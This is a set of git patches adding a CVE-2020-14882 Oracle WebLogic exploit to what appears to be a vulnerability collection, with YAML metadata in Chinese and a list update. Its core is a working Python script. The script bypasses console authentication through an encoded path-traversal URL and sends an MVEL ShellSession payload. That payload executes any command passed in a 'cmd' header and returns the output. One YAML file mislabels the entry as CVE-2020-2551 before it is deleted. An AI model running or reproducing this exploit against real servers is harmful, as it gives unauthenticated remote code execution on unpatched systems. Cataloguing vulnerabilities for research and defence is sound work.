From d3465f0683cac4bd01b90e4e9f13fd1811d47a11 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 08:19:18 +0000 Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2020-14882?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/CVE-2020-14882/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/CVE-2020-14882/.keep diff --git a/cve/weblogic/2020/CVE-2020-14882/.keep b/cve/weblogic/2020/CVE-2020-14882/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 50df74a23981b316d53aeb6fa1e6f9db8f1bf034 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 08:20:03 +0000 Subject: [PATCH 2/8] rename cve/weblogic/2020/CVE-2020-14882/.keep to cve/weblogic/2020/CVE-2020-14882/.py. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 欣欣向荣-buaa --- cve/weblogic/2020/CVE-2020-14882/.keep | 0 cve/weblogic/2020/CVE-2020-14882/.py | 64 ++++++++++++++++++++++++++ 2 files changed, 64 insertions(+) delete mode 100644 cve/weblogic/2020/CVE-2020-14882/.keep create mode 100644 cve/weblogic/2020/CVE-2020-14882/.py diff --git a/cve/weblogic/2020/CVE-2020-14882/.keep b/cve/weblogic/2020/CVE-2020-14882/.keep deleted file mode 100644 index e69de29b..00000000 diff --git a/cve/weblogic/2020/CVE-2020-14882/.py b/cve/weblogic/2020/CVE-2020-14882/.py new file mode 100644 index 00000000..23d5336d --- /dev/null +++ b/cve/weblogic/2020/CVE-2020-14882/.py @@ -0,0 +1,64 @@ +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +# author: XINXINXIANGRONG +import http.client +import requests +import sys +import argparse +http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + +payload_cve_2020_14882_v12 = ('_nfpb=true&_pageLabel=&handle=' + 'com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = ' + '(weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = ' + 'executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField' + '("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet' + '.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) ' + 'obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); ' + 'String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]' + '{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result ' + '= new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter' + '("\\\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.' + 'ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req);' + 'res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));' + 'res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");') + +def cve_2020_14882(url, cmd): + payload = payload_cve_2020_14882_v12 + path = "/console/css/%252e%252e%252fconsole.portal" + headers = { + 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,' + 'application/signed-exchange;v=b3;q=0.9', + 'Accept-Encoding': 'gzip, deflate', + 'Accept-Language': 'zh-CN,zh;q=0.9', + 'Connection': 'close', + 'Content-Type': 'application/x-www-form-urlencoded', + 'cmd': cmd + } + try: + request = requests.post(url + path, data=payload, headers=headers, timeout=10, verify=False) + print(request.text) + except Exception as error: + print("[-] Vuln Check Failed... ...") + print("[-] More Weblogic vulnerabilities in https://github.com/zhzyker/vulmap") + + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description='Weblogic cve-2020-14882', + usage='use "python %(prog)s --help" for more information', + formatter_class=argparse.RawTextHelpFormatter) + parser.add_argument("-u", "--url", + dest="url", + help="target url (http://127.0.0.1:7001)" + ) + + parser.add_argument("-c", "--cmd", + dest="cmd", + help="command" + ) + args = parser.parse_args() + if not args.url or not args.cmd: + sys.exit('[*] Please assign url and cmd! \n[*] Examples python cve-2020-14882_rce.py -u http://127.0.0.1:7001 -c whoami') + cve_2020_14882(args.url, args.cmd) \ No newline at end of file -- Gitee From ebcf1932972b9bb9c415de07d398fa878139dced Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 08:20:56 +0000 Subject: [PATCH 3/8] add cve/weblogic/2020/yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 欣欣向荣-buaa --- cve/weblogic/2020/yaml/cve-2020-14882.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/weblogic/2020/yaml/cve-2020-14882.yaml diff --git a/cve/weblogic/2020/yaml/cve-2020-14882.yaml b/cve/weblogic/2020/yaml/cve-2020-14882.yaml new file mode 100644 index 00000000..e69de29b -- Gitee From ee55c5acc61d570bd211d48ae7a16d91ae67a8c1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 08:55:33 +0000 Subject: [PATCH 4/8] update cve/weblogic/2020/yaml/cve-2020-14882.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 欣欣向荣-buaa --- cve/weblogic/2020/yaml/cve-2020-14882.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/cve/weblogic/2020/yaml/cve-2020-14882.yaml b/cve/weblogic/2020/yaml/cve-2020-14882.yaml index e69de29b..a1540092 100644 --- a/cve/weblogic/2020/yaml/cve-2020-14882.yaml +++ b/cve/weblogic/2020/yaml/cve-2020-14882.yaml @@ -0,0 +1,20 @@ +id: CVE-2020-2551 +source: https://github.com/hktalent/CVE-2020-2551 +info: + name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: critical + description: | + 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 + reference: + - https://www.oracle.com/security-alerts/cpujan2020.html + - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-2551 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2020, Weblogic, 反序列化 \ No newline at end of file -- Gitee From 1777d2eaa742e9767c29ecaaea12a3f66a30bdb4 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 08:56:31 +0000 Subject: [PATCH 5/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?weblogic/2020/yaml/cve-2020-14882.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/yaml/cve-2020-14882.yaml | 20 -------------------- 1 file changed, 20 deletions(-) delete mode 100644 cve/weblogic/2020/yaml/cve-2020-14882.yaml diff --git a/cve/weblogic/2020/yaml/cve-2020-14882.yaml b/cve/weblogic/2020/yaml/cve-2020-14882.yaml deleted file mode 100644 index a1540092..00000000 --- a/cve/weblogic/2020/yaml/cve-2020-14882.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: CVE-2020-2551 -source: https://github.com/hktalent/CVE-2020-2551 -info: - name: WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 - severity: critical - description: | - 这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。 - scope-of-influence: - weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 - reference: - - https://www.oracle.com/security-alerts/cpujan2020.html - - https://nvd.nist.gov/vuln/detail/CVE-2020-2551 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.8 - cve-id: CVE-2020-2551 - cwe-id: None - cnvd-id: None - kve-id: None - tags: cve2020, Weblogic, 反序列化 \ No newline at end of file -- Gitee From 1c90f2ef5be67c0d5118f37cc15c500f7e423d90 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 08:57:43 +0000 Subject: [PATCH 6/8] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/weblogic/?= =?UTF-8?q?2020/CVE-2020-14882/.py=20=E4=B8=BA=20cve/weblogic/2020/CVE-202?= =?UTF-8?q?0-14882/CVE-2020-14882.py?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/weblogic/2020/CVE-2020-14882/{.py => CVE-2020-14882.py} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cve/weblogic/2020/CVE-2020-14882/{.py => CVE-2020-14882.py} (100%) diff --git a/cve/weblogic/2020/CVE-2020-14882/.py b/cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py similarity index 100% rename from cve/weblogic/2020/CVE-2020-14882/.py rename to cve/weblogic/2020/CVE-2020-14882/CVE-2020-14882.py -- Gitee From a65577b39773a622e848b9c63e38b2b783a0f6f1 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 09:02:02 +0000 Subject: [PATCH 7/8] add cve/weblogic/2020/yaml/CVE-2020-14882.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 欣欣向荣-buaa --- cve/weblogic/2020/yaml/CVE-2020-14882.yaml | 23 ++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cve/weblogic/2020/yaml/CVE-2020-14882.yaml diff --git a/cve/weblogic/2020/yaml/CVE-2020-14882.yaml b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml new file mode 100644 index 00000000..94ff4774 --- /dev/null +++ b/cve/weblogic/2020/yaml/CVE-2020-14882.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-14882 +source: https://github.com/zhzyker/exphub/blob/master/weblogic/cve-2020-14882_rce.py +info: + name: WebLogic是美国Oracle公司出品的一个application server,是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 + severity: critical + description: | + CVE-2020-14882允许未授权的用户绕过管理控制台的权限验证访问后台 + scope-of-influence: + weblogic 10.3.6.0.0, weblogic 12.1.3.0.0, weblogic 12.2.1.3.0, weblogic 12.2.1.4.0 + reference: + https://nvd.nist.gov/vuln/detail/CVE-2020-14882 + https://www.oracle.com/security-alerts/cpuoct2020.html + http://packetstormsecurity.com/files/159769/Oracle-WebLogic-Server-Remote-Code-Execution.html + http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html + http://packetstormsecurity.com/files/161128/Oracle-WebLogic-Server-12.2.1.0-Remote-Code-Execution.html + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2020-14882 + cwe-id: None + cnvd-id: None + kve-id: None + tags: cve2020, Weblogic \ No newline at end of file -- Gitee From a6dc7ed23074c9532812de7cc5bf48e0e7ce44bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E6=AC=A3=E6=AC=A3=E5=90=91=E8=8D=A3-buaa?= Date: Thu, 30 Mar 2023 09:03:37 +0000 Subject: [PATCH 8/8] update openkylin_list.yaml. MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 欣欣向荣-buaa --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 24cb593f..3bc82cfc 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -86,6 +86,7 @@ cve: - CVE-2022-26134 weblogic: - CVE-2020-2551 + - CVE-2020-14882 polkit: - CVE-2021-4034 - CVE-2021-4115 -- Gitee